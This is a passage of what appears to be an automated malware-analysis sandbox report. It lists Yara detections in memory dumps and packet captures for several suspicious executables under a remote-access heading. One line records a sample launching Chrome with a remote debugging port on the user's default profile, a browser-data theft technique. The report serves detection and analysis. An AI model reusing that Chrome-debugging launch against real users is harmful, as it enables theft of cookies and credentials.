Source: Yara match File source: 0000000C.00000003.2828932189.00000000013B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2669358178.00000000013BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: cfc45d1c7c.exe PID: 5804, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cfc45d1c7c.exe PID: 2708, type: MEMORYSTR

Remote Access Functionality

barindex
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Source: Yara match File source: 0000000D.00000003.2776187475.0000000000F83000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 064deba48e.exe PID: 5660, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 064deba48e.exe PID: 4148, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: Process Memory Space: cfc45d1c7c.exe PID: 5804, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cfc45d1c7c.exe PID: 2708, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 0000001E.00000002.2934072138.0000000000151000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2746064201.0000000000151000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.2705375842.0000000004B40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2749590843.0000000000E7E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.2943159738.0000000000E4B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.2842925428.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 686764db73.exe PID: 5800, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 686764db73.exe PID: 6596, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs